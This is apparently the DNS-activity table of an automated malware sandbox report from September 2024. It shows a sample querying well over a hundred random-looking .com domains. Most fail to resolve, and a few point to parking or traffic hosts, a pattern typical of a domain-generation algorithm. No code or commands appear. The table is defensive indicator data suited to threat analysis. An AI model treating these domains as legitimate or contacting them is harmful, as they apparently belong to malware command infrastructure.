                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294981956 CEST1.1.1.1192.168.2.90x25No error (0)www.sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294992924 CEST1.1.1.1192.168.2.90x25No error (0)ww16.vofycot.comwww.sedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.294992924 CEST1.1.1.1192.168.2.90x25No error (0)www.sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.122683048 CEST1.1.1.1192.168.2.90x408bName error (3)volybec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.123718023 CEST1.1.1.1192.168.2.90xeee9Name error (3)galyvas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.125843048 CEST1.1.1.1192.168.2.90x4473Name error (3)lysytyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.126777887 CEST1.1.1.1192.168.2.90x5ad6Name error (3)pumyjig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.128262043 CEST1.1.1.1192.168.2.90x21a3Name error (3)qeqykog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.135792971 CEST1.1.1.1192.168.2.90x825aName error (3)purywop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.145951986 CEST1.1.1.1192.168.2.90xdc33Name error (3)lymyjon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.147556067 CEST1.1.1.1192.168.2.90xbf0fName error (3)vofypuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.149491072 CEST1.1.1.1192.168.2.90x5c6bName error (3)gadypuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.149996996 CEST1.1.1.1192.168.2.90x5995Name error (3)qedytul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.150046110 CEST1.1.1.1192.168.2.90x3355Name error (3)qetyrap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.153877974 CEST1.1.1.1192.168.2.90x1d65Name error (3)puzybep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.169240952 CEST1.1.1.1192.168.2.90x8d04Name error (3)qegyxug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.172739029 CEST1.1.1.1192.168.2.90x29d4Name error (3)vojypuc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174253941 CEST1.1.1.1192.168.2.90x7736Name error (3)gaqyqis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.176160097 CEST1.1.1.1192.168.2.90xa830Name error (3)vojycif.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177789927 CEST1.1.1.1192.168.2.90xd444Name error (3)pumymuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.179352045 CEST1.1.1.1192.168.2.90xf862Name error (3)gadyzyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.179538965 CEST1.1.1.1192.168.2.90xf63dName error (3)puzydal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.180217028 CEST1.1.1.1192.168.2.90x8a8cName error (3)volydot.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181261063 CEST1.1.1.1192.168.2.90x37b8Name error (3)qexyfel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181571960 CEST1.1.1.1192.168.2.90xdce9Name error (3)lysylej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183727026 CEST1.1.1.1192.168.2.90xa32bName error (3)pufyxug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188530922 CEST1.1.1.1192.168.2.90xb8c5Name error (3)lyvyguj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188543081 CEST1.1.1.1192.168.2.90x14c5Name error (3)qeqyqiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188550949 CEST1.1.1.1192.168.2.90xb30aName error (3)ganyhuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.188988924 CEST1.1.1.1192.168.2.90xaeaeName error (3)qetykol.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.189580917 CEST1.1.1.1192.168.2.90x372Name error (3)qegytyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.190174103 CEST1.1.1.1192.168.2.90xe073Name error (3)puryjil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.191195011 CEST1.1.1.1192.168.2.90x67faName error (3)gatyrez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.193798065 CEST1.1.1.1192.168.2.90x5b39Name error (3)qebyhuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.193808079 CEST1.1.1.1192.168.2.90x18adName error (3)pupytyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.194346905 CEST1.1.1.1192.168.2.90x5e80Name error (3)lykyvod.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.196710110 CEST1.1.1.1192.168.2.90x47beName error (3)lymymud.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.196789980 CEST1.1.1.1192.168.2.90xd5c5Name error (3)vowyqoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.197362900 CEST1.1.1.1192.168.2.90x2e0eName error (3)puvygyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.198577881 CEST1.1.1.1192.168.2.90xffd6Name error (3)galydoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201136112 CEST1.1.1.1192.168.2.90xadebName error (3)vopyret.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207305908 CEST1.1.1.1192.168.2.90x8f53Name error (3)vocygyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.208815098 CEST1.1.1.1192.168.2.90x5daaName error (3)lyryjir.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.209063053 CEST1.1.1.1192.168.2.90xd5f7Name error (3)gatykow.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.209265947 CEST1.1.1.1192.168.2.90xc72aName error (3)lygyxun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.209997892 CEST1.1.1.1192.168.2.90x54eaName error (3)lyxyfar.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.210737944 CEST1.1.1.1192.168.2.90x6f75Name error (3)vofyzym.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.210982084 CEST1.1.1.1192.168.2.90xb525Name error (3)vopykak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.210990906 CEST1.1.1.1192.168.2.90x9867Name error (3)qekysip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.211334944 CEST1.1.1.1192.168.2.90xb619Name error (3)pujypup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.211344957 CEST1.1.1.1192.168.2.90x58d8Name error (3)lyrywax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.211353064 CEST1.1.1.1192.168.2.90x90daName error (3)lyvynen.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.211971045 CEST1.1.1.1192.168.2.90xa2e7Name error (3)vonyjim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.213908911 CEST1.1.1.1192.168.2.90xa242Name error (3)pujycov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.215290070 CEST1.1.1.1192.168.2.90x2d37Name error (3)vonymuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.216772079 CEST1.1.1.1192.168.2.90x873dName error (3)ganynyb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.217065096 CEST1.1.1.1192.168.2.90x4f02Name error (3)qebynyg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.217082977 CEST1.1.1.1192.168.2.90x64a5Name error (3)qekyvav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.217160940 CEST1.1.1.1192.168.2.90xc908Name error (3)puvybeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.217858076 CEST1.1.1.1192.168.2.90xe2afName error (3)gahycib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.218209028 CEST1.1.1.1192.168.2.90xc4d4Name error (3)vocybam.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.220618963 CEST1.1.1.1192.168.2.90x2210Name error (3)gacyfew.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.230979919 CEST1.1.1.1192.168.2.90xfe9bName error (3)pupylaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.232223034 CEST1.1.1.1192.168.2.90xed7Name error (3)lykysix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.335026979 CEST1.1.1.1192.168.2.90xde55Name error (3)gacyvah.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.340359926 CEST1.1.1.1192.168.2.90x2c5bName error (3)gahypus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.340898037 CEST1.1.1.1192.168.2.90x63d8Name error (3)qedyleq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.536384106 CEST1.1.1.1192.168.2.90xe7e4Name error (3)lysywon.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.537617922 CEST1.1.1.1192.168.2.90x3507Name error (3)lygytyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.542563915 CEST1.1.1.1192.168.2.90x2fbbName error (3)vonygec.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.544511080 CEST1.1.1.1192.168.2.90x4d43Name error (3)gaqyhuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.545516014 CEST1.1.1.1192.168.2.90x281fName error (3)qeqyhup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.547812939 CEST1.1.1.1192.168.2.90x438cName error (3)lymygyx.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.548620939 CEST1.1.1.1192.168.2.90x3cfbName error (3)galycuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.549792051 CEST1.1.1.1192.168.2.90xbf24Name error (3)volypum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.551472902 CEST1.1.1.1192.168.2.90x3fb7Name error (3)vowyjut.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.551809072 CEST1.1.1.1192.168.2.90x80f9Name error (3)gadyrab.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.552216053 CEST1.1.1.1192.168.2.90x6ae1Name error (3)qedyrag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.552771091 CEST1.1.1.1192.168.2.90xa8feName error (3)lyvyvix.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.553030968 CEST1.1.1.1192.168.2.90xcd97Name error (3)qexyvoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.567110062 CEST1.1.1.1192.168.2.90x59d0Name error (3)volycik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.570364952 CEST1.1.1.1192.168.2.90xc44bName error (3)puzyciq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.584700108 CEST1.1.1.1192.168.2.90x7362Name error (3)vojyrak.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.596860886 CEST1.1.1.1192.168.2.90xc5eaName error (3)qedykiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.597546101 CEST1.1.1.1192.168.2.90x37abName error (3)vowymyk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.598356009 CEST1.1.1.1192.168.2.90x7bb6Name error (3)qebyvop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.600259066 CEST1.1.1.1192.168.2.90xbc44Name error (3)vonybat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.614674091 CEST1.1.1.1192.168.2.90x310cName error (3)gadykos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.614842892 CEST1.1.1.1192.168.2.90x3b01Name error (3)pufylap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.615109921 CEST1.1.1.1192.168.2.90xe6bcName error (3)pupyjuv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.615413904 CEST1.1.1.1192.168.2.90xc8c2Name error (3)ganyvoz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.615708113 CEST1.1.1.1192.168.2.90x7e48Name error (3)gaqynyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.616494894 CEST1.1.1.1192.168.2.90x2b1cName error (3)qexysig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.617953062 CEST1.1.1.1192.168.2.90xed1cName error (3)qeqynel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.618499994 CEST1.1.1.1192.168.2.90x745eName error (3)lyxysun.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.619513988 CEST1.1.1.1192.168.2.90x4d45Name error (3)vopyjuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.619843006 CEST1.1.1.1192.168.2.90x2e14Name error (3)lysyjid.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.622466087 CEST1.1.1.1192.168.2.90xf94cName error (3)pumybal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.635530949 CEST1.1.1.1192.168.2.90x3a68Name error (3)lymyner.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.635941982 CEST1.1.1.1192.168.2.90xaa88Name error (3)puzypug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.640340090 CEST1.1.1.1192.168.2.90x9ddaName error (3)lykytej.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.645279884 CEST1.1.1.1192.168.2.90x4be4Name error (3)galypyh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.661746979 CEST1.1.1.1192.168.2.90xd2e1Name error (3)gatyqih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.662893057 CEST1.1.1.1192.168.2.90x4d8eName error (3)lykyxur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.663558960 CEST1.1.1.1192.168.2.90xa4e2No error (0)qetyhyg.com64.225.91.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.671547890 CEST1.1.1.1192.168.2.90xa793Name error (3)vojyzyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.673998117 CEST1.1.1.1192.168.2.90xeeceName error (3)purymuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.676985025 CEST1.1.1.1192.168.2.90x546fName error (3)lyvyfad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.678278923 CEST1.1.1.1192.168.2.90x7790Name error (3)qegylep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.678287983 CEST1.1.1.1192.168.2.90xcf24Name error (3)lyrymuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.679132938 CEST1.1.1.1192.168.2.90x3b1cName error (3)vocydof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.679982901 CEST1.1.1.1192.168.2.90x62b5Name error (3)gacydib.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.680479050 CEST1.1.1.1192.168.2.90x218bName error (3)qetyquq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.680537939 CEST1.1.1.1192.168.2.90x7d47Name error (3)lygylax.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.682861090 CEST1.1.1.1192.168.2.90x12a1Name error (3)pupywog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.684345961 CEST1.1.1.1192.168.2.90xecf2Name error (3)gahyzez.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.695954084 CEST1.1.1.1192.168.2.90x5bf2Name error (3)pufytev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.700207949 CEST1.1.1.1192.168.2.90xe1bName error (3)lyxyvoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.700222015 CEST1.1.1.1192.168.2.90x8623Name error (3)puvycip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.700855017 CEST1.1.1.1192.168.2.90x34ecName error (3)puvydov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.703665018 CEST1.1.1.1192.168.2.90xced2Name error (3)pumygyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.726388931 CEST1.1.1.1192.168.2.90x938bName error (3)qekyxul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.726402998 CEST1.1.1.1192.168.2.90x2f99Name error (3)pujyxyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.727365017 CEST1.1.1.1192.168.2.90x8b0cName error (3)qebyfav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.727386951 CEST1.1.1.1192.168.2.90x9e52Name error (3)ganyfes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.733216047 CEST1.1.1.1192.168.2.90xd6aeName error (3)pujyteq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.749243021 CEST1.1.1.1192.168.2.90xb3d8Name error (3)vopyqim.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.761037111 CEST1.1.1.1192.168.2.90x3850Name error (3)vofykoc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.799659014 CEST1.1.1.1192.168.2.90x8331Name error (3)qekytyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.837129116 CEST1.1.1.1192.168.2.90xbe96No error (0)gatyhub.compltraffic7.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.837129116 CEST1.1.1.1192.168.2.90xbe96No error (0)pltraffic7.com72.52.179.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.087320089 CEST1.1.1.1192.168.2.90x1045Name error (3)pumydoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.095510006 CEST1.1.1.1192.168.2.90x7efdName error (3)gahyraw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.103358984 CEST1.1.1.1192.168.2.90xdd2Name error (3)lymyfoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.105367899 CEST1.1.1.1192.168.2.90xc31cName error (3)gacycus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.111334085 CEST1.1.1.1192.168.2.90x92a4Name error (3)volyzef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.120260000 CEST1.1.1.1192.168.2.90xa284Name error (3)lyrygyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.129601955 CEST1.1.1.1192.168.2.90x88e4Name error (3)pumycug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.135562897 CEST1.1.1.1192.168.2.90x6927Name error (3)pufyjuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148310900 CEST1.1.1.1192.168.2.90x6d14Name error (3)ganycuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148847103 CEST1.1.1.1192.168.2.90x936eName error (3)gatynes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148855925 CEST1.1.1.1192.168.2.90x3e12Name error (3)pupymyp.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148962975 CEST1.1.1.1192.168.2.90x3ec0Name error (3)puzytap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.149111986 CEST1.1.1.1192.168.2.90x5399Name error (3)vopymyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.150423050 CEST1.1.1.1192.168.2.90xef57Name error (3)gadyhyw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.150759935 CEST1.1.1.1192.168.2.90x7c53Name error (3)qedyhyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.151099920 CEST1.1.1.1192.168.2.90x1ab2Name error (3)volyrac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.152224064 CEST1.1.1.1192.168.2.90xd0afName error (3)qedyqup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.155128002 CEST1.1.1.1192.168.2.90xc80bName error (3)puvypul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.155138016 CEST1.1.1.1192.168.2.90xa1eeName error (3)vojykom.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.155147076 CEST1.1.1.1192.168.2.90xeef2Name error (3)qebysul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.156631947 CEST1.1.1.1192.168.2.90x64aeName error (3)qekylag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160926104 CEST1.1.1.1192.168.2.90xa458Name error (3)lyvysur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.162731886 CEST1.1.1.1192.168.2.90x9fadName error (3)qebyxyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.167871952 CEST1.1.1.1192.168.2.90x3e21Name error (3)qegykiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.167882919 CEST1.1.1.1192.168.2.90x13e5Name error (3)vowybof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.168625116 CEST1.1.1.1192.168.2.90x9d01Name error (3)lykylan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.169579983 CEST1.1.1.1192.168.2.90x2f25Name error (3)pupygel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.169904947 CEST1.1.1.1192.168.2.90xfb4aName error (3)vonydik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.170226097 CEST1.1.1.1192.168.2.90x7d65Name error (3)ganydiw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.170526981 CEST1.1.1.1192.168.2.90xe0aeName error (3)purygeg.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.170847893 CEST1.1.1.1192.168.2.90x11edName error (3)qekyrov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.171014071 CEST1.1.1.1192.168.2.90xd8f7Name error (3)vopygat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.171024084 CEST1.1.1.1192.168.2.90x5a55Name error (3)lyxytex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176842928 CEST1.1.1.1192.168.2.90xb84cName error (3)gahykih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.177359104 CEST1.1.1.1192.168.2.90xbf2dName error (3)gaqyvob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.180094004 CEST1.1.1.1192.168.2.90x19f7Name error (3)qexytep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.182302952 CEST1.1.1.1192.168.2.90x436bName error (3)vofyjuk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.183463097 CEST1.1.1.1192.168.2.90x840aName error (3)lymyvin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.183619022 CEST1.1.1.1192.168.2.90x2ae1Name error (3)qeqyvig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.183955908 CEST1.1.1.1192.168.2.90xbf89Name error (3)vowygem.comnonenoneA (IP address)IN (0x0001)false
